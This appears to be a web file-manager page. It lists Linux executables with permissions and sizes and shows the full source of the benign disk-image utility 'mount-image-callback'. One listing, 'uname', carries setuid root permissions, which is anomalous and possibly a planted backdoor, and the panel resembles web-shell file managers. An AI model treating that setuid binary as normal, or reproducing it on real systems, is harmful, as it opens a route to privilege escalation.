-rwxr-xr-x
systemd-machine-id-setup
18.48
KB
-rwxr-xr-x
systemd-mount
50.59
KB
-rwxr-xr-x
systemd-notify
18.38
KB
-rwxr-xr-x
systemd-path
18.37
KB
-rwxr-xr-x
systemd-repart
150.69
KB
-rwxr-xr-x
systemd-run
58.57
KB
-rwxr-xr-x
systemd-socket-activate
26.38
KB
-rwxr-xr-x
systemd-stdio-bridge
18.38
KB
-rwxr-xr-x
systemd-sysext
42.49
KB
-rwxr-xr-x
systemd-sysusers
62.68
KB
-rwxr-xr-x
systemd-tmpfiles
110.57
KB
-rwxr-xr-x
systemd-tty-ask-password-agent
34.38
KB
-rwxr-xr-x
systemd-umount
50.59
KB
-rwxr-xr-x
tabs
18.23
KB
-rwxr-xr-x
tac
111.05
KB
-rwxr-xr-x
tail
75.14
KB
-rwxr-xr-x
tar
519.52
KB
-rwxr-xr-x
taskset
62.31
KB
-rwxr-xr-x
tbl
146.43
KB
-rwxr-xr-x
tbl-dctrl
39.04
KB
-rwxr-xr-x
tcpdump
1.21
MB
-rwxr-xr-x
tee
42.95
KB
-rwxr-xr-x
tempfile
14.18
KB
-rwxr-xr-x
test
58.89
KB
-rwxr-xr-x
tic
90.34
KB
-rwxr-xr-x
timedatectl
42.37
KB
-rwxr-xr-x
timeout
47.49
KB
-rwxr-xr-x
tload
18.32
KB
-rwxr-xr-x
toe
22.23
KB
-rwxr-xr-x
top
131.58
KB
-rwxr-xr-x
touch
107.05
KB
-rwxr-xr-x
tput
26.27
KB
-rwxr-xr-x
tr
54.89
KB
-rwxr-xr-x
traceproto
2.82
KB
-rwxr-xr-x
traceproto.db
2.82
KB
-rwxr-xr-x
traceroute
71.23
KB
-rwxr-xr-x
traceroute-nanog
1.58
KB
-rwxr-xr-x
traceroute.db
71.23
KB
-rwxr-xr-x
traceroute6
71.23
KB
-rwxr-xr-x
traceroute6.db
71.23
KB
-rwxr-xr-x
troff
755.83
KB
-rwxr-xr-x
true
34.83
KB
-rwxr-xr-x
truncate
42.89
KB
-rwxr-xr-x
tset
30.24
KB
-rwxr-xr-x
tsort
54.89
KB
-rwxr-xr-x
tty
34.86
KB
-rwxr-xr-x
tzselect
14.99
KB
-rwxr-xr-x
ubuntu-cloudimg-query
8.37
KB
-rwxr-xr-x
ucf
40.69
KB
-rwxr-xr-x
ucfq
18.91
KB
-rwxr-xr-x
ucfr
10.85
KB
-rwxr-xr-x
uclampset
62.31
KB
-rwxr-xr-x
udevadm
1.29
MB
-rwxr-xr-x
ul
22.31
KB
-rwxr-xr-x
umount
34.3
KB
-rwsr-xr-x
uname
42.86
KB
-rwxr-xr-x
unattended-upgrade
97.21
KB
-rwxr-xr-x
unattended-upgrades
97.21
KB
-rwxr-xr-x
uncompress
2.29
KB
-rwxr-xr-x
unexpand
42.92
KB
-rwxr-xr-x
uniq
46.95
KB
-rwxr-xr-x
unlink
38.83
KB
-rwxr-xr-x
unlzma
82.7
KB
-rwxr-xr-x
unmkinitramfs
3.59
KB
-rwxr-xr-x
unshare
82.54
KB
-rwxr-xr-x
unxz
82.7
KB
-rwxr-xr-x
unzip
175.05
KB
-rwxr-xr-x
unzipsfx
82.86
KB
-rwxr-xr-x
unzstd
1.22
MB
-rwxr-xr-x
update-alternatives
58.31
KB
-rwxr-xr-x
uptime
14.3
KB
-rwxr-xr-x
users
38.89
KB
-rwxr-xr-x
utmpdump
30.3
KB
-rwxr-xr-x
uuidgen
18.3
KB
-rwxr-xr-x
uuidparse
42.31
KB
-rwxr-xr-x
vcs-run
6.75
KB
-rwxr-xr-x
vdir
147.8
KB
-rwxr-xr-x
vi
3.48
MB
-rwxr-xr-x
view
3.48
MB
-rwxr-xr-x
vim
3.48
MB
-rwxr-xr-x
vim.basic
3.48
MB
-rwxr-xr-x
vim.tiny
1.55
MB
-rwxr-xr-x
vimdiff
3.48
MB
-rwxr-xr-x
vimtutor
2.1
KB
-rwxr-xr-x
vmstat
34.72
KB
-rwxr-xr-x
w
22.3
KB
-rwxr-xr-x
wall
38.3
KB
-rwxr-xr-x
watch
26.71
KB
-rwxr-xr-x
wc
51.05
KB
-rwxr-xr-x
wdctl
70.34
KB
-rwxr-xr-x
wget
459.36
KB
-rwxr-xr-x
whatis
51.29
KB
-rwxr-xr-x
whereis
30.77
KB
-rwxr-xr-x
which
946
B
-rwxr-xr-x
which.debianutils
946
B
-rwxr-xr-x
whiptail
26.75
KB
-rwxr-xr-x
who
59.02
KB
-rwxr-xr-x
whoami
38.86
KB
-rwxr-xr-x
write
22.31
KB
-rwxr-xr-x
write-mime-multipart
3.54
KB
-rwxr-xr-x
x86_64
26.58
KB
-rwxr-xr-x
x86_64-linux-gnu-addr2line
23.14
KB
-rwxr-xr-x
x86_64-linux-gnu-ar
51.17
KB
-rwxr-xr-x
x86_64-linux-gnu-as
897.41
KB
-rwxr-xr-x
x86_64-linux-gnu-c++filt
18.51
KB
-rwxr-xr-x
x86_64-linux-gnu-cpp
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-cpp-12
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-dwp
1.79
MB
-rwxr-xr-x
x86_64-linux-gnu-elfedit
35.03
KB
-rwxr-xr-x
x86_64-linux-gnu-g++
1.25
MB
-rwxr-xr-x
x86_64-linux-gnu-g++-12
1.25
MB
-rwxr-xr-x
x86_64-linux-gnu-gcc
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-gcc-12
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ar
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ar-12
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-nm
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-nm-12
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ranlib
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ranlib-12
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov
720.16
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-12
720.16
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-dump
568.02
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-dump-12
568.02
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-tool
588.09
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-tool-12
588.09
KB
-rwxr-xr-x
x86_64-linux-gnu-gold
2.99
MB
-rwxr-xr-x
x86_64-linux-gnu-gp-archive
159.06
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-collect-ap...
175.27
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-display-ht...
578.29
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-display-sr...
150.81
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-display-te...
257.3
KB
-rwxr-xr-x
x86_64-linux-gnu-gprof
108.35
KB
-rwxr-xr-x
x86_64-linux-gnu-gprofng
146.59
KB
-rwxr-xr-x
x86_64-linux-gnu-ld
1.27
MB
-rwxr-xr-x
x86_64-linux-gnu-ld.bfd
1.27
MB
-rwxr-xr-x
x86_64-linux-gnu-ld.gold
2.99
MB
-rwxr-xr-x
x86_64-linux-gnu-lto-dump
30.47
MB
-rwxr-xr-x
x86_64-linux-gnu-lto-dump-12
30.47
MB
-rwxr-xr-x
x86_64-linux-gnu-nm
44.03
KB
-rwxr-xr-x
x86_64-linux-gnu-objcopy
155.66
KB
-rwxr-xr-x
x86_64-linux-gnu-objdump
362.56
KB
-rwxr-xr-x
x86_64-linux-gnu-ranlib
51.17
KB
-rwxr-xr-x
x86_64-linux-gnu-readelf
751.38
KB
-rwxr-xr-x
x86_64-linux-gnu-size
26.86
KB
-rwxr-xr-x
x86_64-linux-gnu-strings
30.98
KB
-rwxr-xr-x
x86_64-linux-gnu-strip
155.7
KB
-rwxr-xr-x
xargs
70.45
KB
-rwxr-xr-x
xmlcatalog
22.23
KB
-rwxr-xr-x
xmllint
74.91
KB
-rwxr-xr-x
xsubpp
5.05
KB
-rwxr-xr-x
xz
82.7
KB
-rwxr-xr-x
xzcat
82.7
KB
-rwxr-xr-x
xzcmp
7.25
KB
-rwxr-xr-x
xzdiff
7.25
KB
-rwxr-xr-x
xzegrep
10.09
KB
-rwxr-xr-x
xzfgrep
10.09
KB
-rwxr-xr-x
xzgrep
10.09
KB
-rwxr-xr-x
xzless
1.77
KB
-rwxr-xr-x
xzmore
2.14
KB
-rwxr-xr-x
yes
38.83
KB
-rwxr-xr-x
ypdomainname
22.15
KB
-rwxr-xr-x
zcat
1.94
KB
-rwxr-xr-x
zcmp
1.64
KB
-rwxr-xr-x
zdiff
6.31
KB
-rwxr-xr-x
zdump
22.52
KB
-rwxr-xr-x
zegrep
29
B
-rwxr-xr-x
zfgrep
29
B
-rwxr-xr-x
zforce
2.03
KB
-rwxr-xr-x
zgrep
7.91
KB
-rwxr-xr-x
zip
212.27
KB
-rwxr-xr-x
zipcloak
92.48
KB
-rwxr-xr-x
zipdetails
68.55
KB
-rwxr-xr-x
zipgrep
2.89
KB
-rwxr-xr-x
zipinfo
175.05
KB
-rwxr-xr-x
zipnote
84.16
KB
-rwxr-xr-x
zipsplit
88.19
KB
-rwxr-xr-x
zless
2.15
KB
-rwxr-xr-x
zmore
1.8
KB
-rwxr-xr-x
znew
4.47
KB
-rwxr-xr-x
zstd
1.22
MB
-rwxr-xr-x
zstdcat
1.22
MB
-rwxr-xr-x
zstdgrep
3.78
KB
-rwxr-xr-x
zstdless
197
B
-rwxr-xr-x
zstdmt
1.22
MB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mount-image-callback
#!/bin/bash VERBOSITY=0 TEMP_D="" UMOUNTS=( ) QEMU_DISCONNECT="" CR=$'\n' TAB=$'\t' error() { echo "$@" 1>&2; } Usage() { cat <<EOF Usage: ${0##*/} [ options ] file cmd [ args ] mount a file to a temporary mount point and then invoke the provided cmd with args supported 'file' are: file : any disk format supported by qemu-nbd the temporary mountpoint will be put in an a environment variable named MOUNTPOINT. if any of the arguments are the literal string '_MOUNTPOINT_', then they will be replaced with the mount point. Example: ${0##*/} my.img chroot _MOUNTPOINT_ /bin/sh Additionally, the helper program 'mchroot' will be added to the path and can be used effectively as 'chroot _MOUNTPOINT_': ${0##*/} my.img mchroot options: -v | --verbose increase verbosity -h | --help print this message. --read-only use read-only mount. -C | --cd-mountpoint change dir to mountpoint before executing cmd. -m | --mountpoint MP mount to directory MP rather than a temp dir --overlay mount via overlayfs -P | --partition PARTNUM mount partition PARTNUM (default 'auto') if 'auto', then mount part 1 if image is partitioned otherwise mount image -p | --proc bind mount /proc -s | --sys bind mount /sys -d | --dev bind mount /dev --system-mounts bind mount /sys, /proc, /dev --system-resolvconf copy host's resolvconf into /etc/resolvconf --format FMT specify the format of the image. default is to automatically determine EOF } # umount_r(mp) : unmount any filesystems under r # this is useful to unmount a chroot that had sys, proc ... mounted umount_r() { local p for p in "$@"; do [ -n "$p" ] || continue tac /proc/mounts | sh -c ' p=$1 didumount=0 while read s mp t opt a b ; do [ "${mp}" = "${p}" -o "${mp#${p}/}" != "${mp}" ] || continue umount "$mp" || exit 1 didumount=1 done [ $didumount -eq 1 ] || exit 1 exit 0' umount_r "${p%/}" [ $? -eq 0 ] || return done } bad_Usage() { Usage 1>&2; [ $# -eq 0 ] || error "$@"; exit 1; } has_cmd() { command -v "$1" >/dev/null 2>&1 } disconnect_qemu() { [ -n "$QEMU_DISCONNECT" ] || return 0 local out="" nbd="$QEMU_DISCONNECT" debug 1 "disconnecting $nbd" local pid="" pfile="/sys/block/${nbd#/dev/}/pid" { read pid < "$pfile" ; } >/dev/null 2>&1 [ -n "$pid" -a ! -d "/proc/$pid" ] && error "qemu-nbd process seems to have died. was '$pid'" out=$(qemu-nbd --disconnect "$nbd" 2>&1) && QEMU_DISCONNECT="" || { error "failed to disconnect $nbd"; error "$out" return 1; } } do_umounts() { local um="" fails=0 mydir="$PWD/" mounts="" i=0 mounts=( "$@" ) for((i=${#mounts[@]}-1;i>=0;i--)); do um=${mounts[$i]} um=$(readlink -f "$um") || { error "WARNING: failed to get full path to '$um'"; fails=$(($fails+1)) continue; } [ "${mydir#${um}/}" != "${mydir}" ] && { error "WARNING: leaving '$mydir' to unmount $um"; cd / } umount_r "$um" || { error "WARNING: unmounting filesystem at $um failed!" fails=$(($fails+1)) } done return $fails } cleanup() { if [ "${#UMOUNTS[@]}" -ne 0 ]; then debug 2 "umounts: ${UMOUNTS[*]}" do_umounts "${UMOUNTS[@]}" || { error "failed cleaning up mounts"; return 1; } fi disconnect_qemu rm -Rf "$TEMP_D" || error "removal of temp dir failed!" } debug() { local level="$1"; shift; [ "${level}" -gt "${VERBOSITY}" ] && return error "${@}" } get_image_format() { local img="$1" out="" out=$(qemu-img info "$img") && out=$(echo "$out" | awk '$0 ~ /^file format:/ { print $3 }') && _RET="$out" } get_partition() { # return in _RET the 'auto' partition for a image. # _RET=partition number for a partitioned image # _RET=0 for unpartitioned local img="$1" out=$(LANG=C sfdisk --list -uS "$img" 2>&1) || { error "failed determining if partitioned: $out"; return 1; } if echo "$out" | grep -q 'Device.*Start.*End'; then _RET=1 else _RET=0 fi } add_bin() { cat > "$1" || { error "failed to write to $1"; return 1; } chmod 755 "$1" || { error "failed to set perms on $1"; return 1; } } add_helpers() { local d="$1" local umap="$1" gmap="$2" [ -d "$1" ] || mkdir -p "$1" add_bin "$d/mchroot" <<"EOF" || return 1 #!/bin/sh exec chroot "$MOUNTPOINT" "$@" EOF return } mount_overlay() { local lower="$1" upper="$2" workdir="$3" local olayopts="lowerdir=$lower,upperdir=$upper" # 3.18+ require 'workdir=' option. case "$(uname -r)" in 2*|3.1[01234567]*|3.[0-9].*) :;; *) olayopts="${olayopts},workdir=$workdir" mkdir -p "$workdir" || { _ERR="Failed to create workdir '$workdir'"; return 1; } ;; esac local cmd="" fstype="" ret="" out="" fsfile="/proc/filesystems" _ERR="" for fstype in overlay overlayfs; do cmd=( mount -t "$fstype" -o "$olayopts" "$lower" "$upper" ) debug 2 "attempting '$fstype' mount with: ${cmd[*]}" out=$("${cmd[@]}" 2>&1) ret=$? if [ $ret -eq 0 ]; then debug 1 "mounted '$fstype' via $fstype: ${cmd[*]}" return 0 fi _ERR="${_ERR}Failed [$ret]: ${cmd[*]}:${CR}" _ERR="${_ERR}$out${CR}" if [ -r "$fsfile" ] && grep -q "${TAB}${fstype}$" "$fsfile"; then # this failed and we have support in kernel. do not try further. return $ret fi done return $ret } assert_nbd_support() { if [ ! -e /sys/block/nbd0 ] && ! grep -q nbd /proc/modules; then debug 1 "trying to load nbd module" modprobe nbd >/dev/null 2>&1 has_cmd udevadm && udevadm settle >/dev/null 2>&1 fi [ -e /sys/block/nbd0 ] || { error "Cannot use nbd: no nbd kernel support." return 1; } } find_unused_nbd() { # return a path to an unused nbd device (/dev/nbd?) local f roflag="" for f in /sys/block/nbd*; do [ -d "$f" -a ! -f "$f/pid" ] && { _RET="/dev/${f##*/}"; return 0; } done error "failed to find an nbd device" return 1; } connect_nbd() { local img="$1" fmt="$2" ptnum="${3:-auto}" rwmode="${3:-ro}" local nbd="" pidfile="" pid="" cmd="" ret="" roflag="" nptnum="" i="" if [ "$rwmode" = "ro" ]; then roflag="--read-only" fi # yes, there is a race condition here. find_unused_nbd || return nbd="$_RET" cmd=( qemu-nbd $roflag "--format=$fmt" --connect "$nbd" "$img" ) "${cmd[@]}" && QEMU_DISCONNECT="$nbd" ret=$? if [ $ret -ne 0 ]; then error "Failed [$ret]: $*" return $ret fi pidfile="/sys/block/${nbd#/dev/}/pid" if [ ! -f "$pidfile" ]; then debug 1 "waiting on pidfile for $nbd in $pidfile" i=0 while [ ! -f "$pidfile" ] && i=$(($i+1)); do if [ $i -eq 200 ]; then error "giving up on pidfile $pidfile for $nbd" disconnect_qemu return 1 fi sleep .1 debug 2 "." done fi read pid < "$pidfile" && debug 2 "pid for $nbd is $pid" || { error "reading pid from $pidfile for $nbd failed!"; disconnect_qemu return 1 } debug 1 "connected $img_in ($fmt) ${rwmode} to $nbd. waiting for device." local out="" # This can fail due to udev events, but we ignore that. We need to ensure # it happens for where it doesnt happen automatically (LP: #1741300) out=$(blockdev --rereadpt "$nbd" 2>&1) || debug 1 "blockdev rereadpt $nbd failed" has_cmd udevadm && udevadm settle i=0 while i=$(($i+1)); do get_partition "$nbd" && nptnum="$_RET" && break [ $i -eq 40 ] && { error "gave up on $nbd" disconnect_qemu return 1 } [ $(($i%10)) -eq 0 ] && debug 1 "waiting for $nbd to be ready." sleep .1 done if [ "${ptnum}" = "auto" ]; then if [ "$nptnum" = "0" ]; then debug 1 "unpartitioned disk." else debug 1 "partitioned disk." fi ptnum=$nptnum else if [ "$nptnum" = "0" -a "$ptnum" != "0" ]; then error "img $img does not appear partitioned but ptnum=$ptnum provided." return 1 fi fi if [ "$ptnum" -ne 0 ]; then mdev="${nbd}p${ptnum}" else mdev="${nbd}" fi i=0 while :; do [ -b "$mdev" ] && break i=$(($i+1)) [ $i -eq 100 ] && { error "gave up on waiting for $mdev" disconnect_qemu return 1 } [ $(($i%10)) -eq 0 ] && debug 1 "waiting for $mdev part=$ptnum to be ready." sleep .1 done _RET_NBD="$nbd" _RET_PT="$ptnum" _RET_DEV="$mdev" } mount_nbd() { local img="$1" mp="$2" fmt="$3" ptnum="$4" rwmode="${5:-rw}" opts="$6" if [ -z "$fmt" ]; then get_image_format "$img" && fmt="$_RET" || { error "failed to get image format for '$img' (try --format)" return 1 } fi assert_nbd_support || return connect_nbd "$img" "$fmt" "$ptnum" "$rwmode" || return local ptnum="$_RET_PT" mdev="$_RET_DEV" nbd="$_RET_NBD" if ( set -f; mount -o "$rwmode" $opts "$mdev" "$img_mp" ); then debug 1 "mounted $mdev via qemu-nbd $nbd at $img_mp" else error "failed to mount $mdev" return 1 fi } mount_callback_umount() { local img_in="$1" dev="" out="" mp="" ret="" img="" readonly=false local opts="" bmounts="" system_resolvconf=false ptnum=auto local cd_mountpoint=false fmt="" overlay=false rwmode="rw" local img_mp="" short_opts="Cdhm:P:psSv" long_opts="cd-mountpoint,dev,help,format:,mountpoint:,overlay,partition:,proc,read-only,sys,system-mounts,system-resolvconf,verbose" getopt_out=$(getopt -n "${0##*/}" \ -o "${short_opts}" -l "${long_opts}" -- "$@") && eval set -- "${getopt_out}" || { bad_Usage; return 1; } while [ $# -ne 0 ]; do cur=${1}; next=${2}; case "$cur" in -C|--cd-mountpoint) cd_mountpoint=true;; -d|--dev) bmounts="${bmounts:+${bmounts} }/dev";; --format) fmt=$next;; -h|--help) Usage ; exit 0;; -m|--mountpoint) mp=$next;; -P|--partition) ptnum=$next;; --overlay) overlay=true;; -p|--proc) bmounts="${bmounts:+${bmounts} }/proc";; -s|--sys) bmounts="${bmounts:+${bmounts} }/sys";; -S|--system-mounts) bmounts="/dev /proc /sys";; --system-resolvconf) system_resolvconf=true;; -v|--verbose) VERBOSITY=$((${VERBOSITY}+1));; --opts) opts="${opts} $next"; shift;; --read-only) readonly=true; rwmode="ro";; --) shift; break;; esac shift; done [ $# -ge 2 ] || { bad_Usage "must provide image and cmd"; return 1; } $readonly && { $system_resolvconf && ! $overlay; } && { error "--read-only is incompatible with system-resolvconf"; error "maybe try with --overlay" return 1; } img_in="$1" shift 1 if [ "${img_in#lxd:}" != "${img_in}" -a ! -f "${img_in}" ]; then error "${img_in}: lxd is no longer supported." return 1; fi img=$(readlink -f "$img_in") || { error "failed to get full path to $img_in"; return 1; } [ -f "$img" ] || { error "$img: not a file"; return 1; } [ "$(id -u)" = "0" ] || { error "sorry, must be root"; return 1; } trap cleanup EXIT TEMP_D=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX") || { error "failed to make tempdir"; return 1; } if [ -z "$mp" ]; then mp="${TEMP_D}/mp" mkdir "$mp" || return else [ -d "$mp" ] || { error "mountpoint '$mp': not a directory"; return 1; } mp=$(readlink -f "$mp") || { error "failed to get full path to provided mountpoint"; return 1; } fi if $overlay; then img_mp="${TEMP_D}/underlay" mkdir -p "$img_mp" || return else img_mp=$mp fi out="" if [ "$ptnum" = "auto" -o "$ptnum" = "0" ] && out=$(set -f; mount -o "loop,$rwmode" $opts "$img" "$img_mp" 2>&1); then debug 1 "mounted simple fs image $rwmode in '$img_in' at $img_mp" UMOUNTS[${#UMOUNTS[@]}]="$img_mp" else local hasqemu=false command -v "qemu-nbd" >/dev/null 2>&1 && hasqemu=true if ! $hasqemu; then error "simple mount of '$img_in' failed." error "if this is not a simple unpartitioned raw image, then" error "you must have qemu-nbd (apt-get install qemu-utils)" if [ -n "$out" ]; then error "mount failed with: $out" fi return 1 fi mount_nbd "$img" "$img_mp" "$fmt" "$ptnum" "$rwmode" "$opts" || return UMOUNTS[${#UMOUNTS[@]}]="$img_mp" fi if $overlay; then mount_overlay "$img_mp" "$mp" "${TEMP_D}/workdir" || { [ -n "${_ERR}" ] && error "${_ERR}" error "Unable to mount overlay filesystem. Maybe no kernel support?" return 1 } UMOUNTS[${#UMOUNTS[@]}]="$mp" fi local bindmp="" for bindmp in $bmounts; do [ -d "$mp${bindmp}" ] || mkdir "$mp${bindmp}" || { error "failed mkdir $bindmp in mount"; return 1; } mount --bind "$bindmp" "$mp${bindmp}" || { error "failed bind mount '$bindmp'"; return 1; } UMOUNTS[${#UMOUNTS[@]}]="$mp${bindmp}" debug 1 "mounted $bindmp to $mp${bindmp}" done if ${system_resolvconf}; then local rcf="$mp/etc/resolv.conf" debug 1 "replacing /etc/resolvconf" if [ -e "$rcf" -o -L "$rcf" ]; then local trcf="$rcf.${0##*/}.$$" rm -f "$trcf" && mv "$rcf" "$trcf" && ORIG_RESOLVCONF="$trcf" || { error "failed mv $rcf"; return 1; } fi cp "/etc/resolv.conf" "$rcf" || { error "failed copy /etc/resolv.conf"; return 1; } fi local cmd="" arg="" found=false cmd=( ) for arg in "$@"; do if [ "${arg}" = "_MOUNTPOINT_" ]; then debug 1 "replaced string _MOUNTPOINT_ in arguments arg ${#cmd[@]}" arg=$mp fi cmd[${#cmd[@]}]="$arg" done if [ "${cmd[0]##*/}" = "bash" -o "${cmd[0]##*/}" = "sh" ] && [ ${#cmd[@]} -eq 0 ]; then debug 1 "invoking shell ${cmd[0]}" error "MOUNTPOINT=$mp" fi add_helpers "$TEMP_D/bin" "$SUBUID" "$SUBGID" || { error "failed to add helpers to $TEMP_D"; return 1; } PATH="$TEMP_D/bin:$PATH" local startwd="$PWD" debug 1 "invoking: MOUNTPOINT=$mp" "${cmd[@]}" ${cd_mountpoint} && cd "$mp" MOUNTPOINT="$mp" "${cmd[@]}" ret=$? cd "$startwd" if ${system_resolvconf}; then local rcf="$mp/etc/resolv.conf" cmp -s "/etc/resolv.conf" "$rcf" >/dev/null || error "WARN: /etc/resolv.conf changed in image!" rm "$rcf" && { [ -z "$ORIG_RESOLVCONF" ] || mv "$ORIG_RESOLVCONF" "$rcf"; } || { error "failed to restore /etc/resolv.conf"; return 1; } fi debug 1 "cmd returned $ret. unmounting $mp" do_umounts "${UMOUNTS[@]}" && UMOUNTS=( ) || { error "failed umount $img"; return 1; } if [ -n "$QEMU_DISCONNECT" ]; then disconnect_qemu || return 1; fi return $ret } mount_callback_umount "$@" # vi: ts=4 noexpandtab
Close